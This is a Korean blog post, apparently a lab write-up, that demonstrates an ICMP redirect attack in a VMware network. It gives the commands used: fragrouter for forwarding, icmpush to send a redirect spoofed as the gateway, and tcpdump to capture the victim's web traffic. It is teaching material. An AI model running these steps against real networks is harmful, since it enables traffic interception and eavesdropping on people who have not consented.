본문 바로가기
Network/공격 기법

ICMP 리다이렉트

by 슬픈 야옹이 2023. 5. 10.

실습환경 : VMware 16

사용 프로그램 : icmpush, tcpdump, wireshark

network : NAT

 

공격자

IP : 192.168.11.19

h/w address : 00:0C:29:E3:D3:C0

 

공격 대상

IP : 192.168.11.77

h/w address : 00:0C:29:8F:7E:5F

 

라우터

IP : 192.168.11.1

h/w address : 00:50:56:FB:DC:5E

 

네트워크 실습 환경

+) 그림은 티스토리 블로그 debuggerworld의 주인장이신 킹버거 선생님의 작품입니다.

https://debuggerworld.tistory.com/

 

Most Delicious Burger : A Debugger

 

debuggerworld.tistory.com

 

 

다음 순서로 진행한다.

 

1. 공격 대상의 네트워크 설정 확인

2. 공격자 PC에서 icmp 리다이렉트 패킷 전송

3. 공격 대상의 네트워크 설정 확인

4. 공격 결과 확인

 

 

 

 

1. 공격 대상의 네트워크 설정 확인

# route print

 

C:\Documents and Settings\st> route print

=======================================================
...
...
========================================================
Active Routes:
Network Destination     Netmask	        Gateway	        Interface        Metric
0.0.0.0                 0.0.0.0	        192.168.11.1    192.168.11.77    10
192.168.11.0            255.255.255.0   192.168.11.77   192.168.11.77    1
...
...
...
==========================================================
Persistent Routes:
	None

 

 

 

 

2. 공격자 PC에서 icmp 리다이렉트 패킷 전송

 

패킷 포워딩 설정

# fragrouter -B1

패킷 포워딩

 

 

 

icmp 리다이렉트 패킷 전송

# icmpush -red -c host -gw 192.168.11.19 -sp 192.168.11.1 -dest 218.38.58.195 192.168.11.77

icmp 리다이렉트 패킷 전송

 

 

 

 

 

wireshark를 통해 icmp 리다이렉트 패킷이 전송된 것을 확인할 수 있다.

icmp 리다이렉트 패킷

 

icmp 리다이렉트 패킷은 기본적으로 게이트웨이 측에서 보내는 패킷이기 때문에,

공격자는 Source IP주소를 게이트웨이 주소로 위조해 icmp 리다이렉트 패킷을 공격 대상에게 전송한다.

 

따라서 패킷 상으로는 Source가 게이트웨이(192.168.11.1)로 출력된다.

 

단, mac주소를 확인해보면 Source mac주소가 공격자의 mac주소(00:0C:29:E3:D3:C0)인 것을 확인할 수 있다.

 

 

 

3. 공격 대상의 네트워크 설정 확인

설정한 ip에 대해 리다이렉트 된 모습

공격 대상의 라우팅 테이블을 확인해보면, 목적지가 218.38.58.195인 패킷을 공격자에게 전송하도록 설정되어있다.

 

 

 

 

4. 공격 결과 확인

공격 대상이 리다이렉트된 주소와 통신하면, 해당 패킷이 공격자에게 흘러들어간다.

218.28.58.195에 접속

 

 

 

따라서 공격자 PC에서 해당 패킷들을 도청할 수 있다.

# tcpdump -i eth0 tcp port 80 and host 192.168.11.77 and ether host 00:0C:29:E3:D3:C0 -w 11-77-icmp.pcap

 

tcpdump로 패킷 도청

 

 

wireshark로 캡처한 패킷을 확인해보면, 공격 대상자(00:0C:29:8F:7E:5F)가 목적지가 218.38.58.195인 패킷을

공격자(00:0C:29:E3:D3:C0)에게 전송하는 것을 확인할 수 있다.

destination mac addr : 00:0C:29:E3:D3:C0 (공격자)

source mac addr : 00:0C:29:8F:7E:5F (공격 대상)

 

 

 

 

 

 

'Network > 공격 기법' 카테고리의 다른 글

ARP 스푸핑 대처법  (0) 2023.05.12
DNS 스푸핑  (0) 2023.05.11
ARP 스푸핑  (0) 2023.05.11
ARP 리다이렉션 (배포판)  (1) 2023.05.10
ARP 리다이렉트 (해설판)  (0) 2023.05.09

관련글

티스토리툴바